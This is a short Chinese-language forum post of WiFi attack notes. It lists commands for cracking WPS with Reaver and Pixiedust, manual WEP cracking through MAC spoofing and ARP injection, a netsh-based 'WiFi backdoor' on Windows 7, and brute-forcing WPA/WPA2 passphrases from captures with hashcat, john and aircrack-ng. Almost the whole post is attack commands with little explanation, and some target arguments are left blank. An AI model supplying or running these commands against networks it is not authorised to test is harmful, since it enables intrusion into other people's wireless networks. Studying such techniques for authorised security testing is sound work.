[文档资料] 各种WiFi测试笔记

管理01 · 发布于 2018-01-09 17:16 · 98 次阅读
1
REAVER / Pixiedust(使用两种工具配合进行WPS攻击):
reaver -i wlan1mon -c<chan#> -b  -vvv -K 1
使用以下命令开启网卡监听模式:
airmon-ng start wlan0
开启airodump-ng获取目标BSSID,MAC地址以及频道信息:
airodump-ng -i wlan0mon
Now pick the target and use the BSSID and the channel for Reaver:
接着在Reaver中指定使用的目标BSSID和频道:
Reaver -i wlan0mon -b [BSSID] -vv -S -c [AP channel]
为了使用Pixiedust破解WPS,我们需要从Reaver获取到的PKE,PKR,e-hash 1 和 e-hash 2, E-nonce 或 R-nonce 以及认证码。
为了避免使用M4消息导致Reaver停止运行,我们使用-P(Pixiedust循环)选项让Reaver进入循环模式破解WPS协议,此选项仅用于Pixie破解WPS过程中收集Hash。
WEP 手工破解
将网卡设置成监听模式并修改MAC地址:
ifconfig wlan0 down
macchanger --mac DE:AD:BE:EF:BA:BE wlan0
airmon-ng start wlan0
airodump-ng wlan0mon
开始抓包:
airodump-ng -c 11 --bssid  -w output_01 wlan0mon
ARP 包:
aireplay-ng -3 -b  -h DE:AD:BE:EF:BA:BE wlan0mon
注入arp:
aireplay-ng -1 0 -e  -a  -h DE:AD:BE:EF:BA:BE wlan0mon
仔细选择热点:
aireplay-ng -1 6000 -o 1 -q 10 -e  -a  -h DE:AD:BE:EF:BA:BE wlan0mon
等待#Data超过10000 IVs
破解dat数据
aircrack-ng -b  output_01-01.cap
不使用.conf连接WiFi:
wpa_passphrase "ESSID" "Password" | wpa_supplicant -Dwext -iwlan0 -c/dev/stdin&
Win7 WIFI后门:
netsh wlan set hostednetwork mode=[allow|disallow]
netsh wlan set hostednetwork ssid= key= keyUsage=persistent|temporary
netsh wlan [start|stop] hostednetwork
破解 WPA/WPA2 PSK:
./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap
john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w -  capture_file.cap
共收到 2 条回复
管理01 · #2 · 2018-3-15 13:45:01  回复
测试
MagicBird · #3 · 2018-4-10 00:39:25  回复
回帖
B Color Image Link Quote Code Smilies
Command + Enter
快速回复 返回顶部 返回列表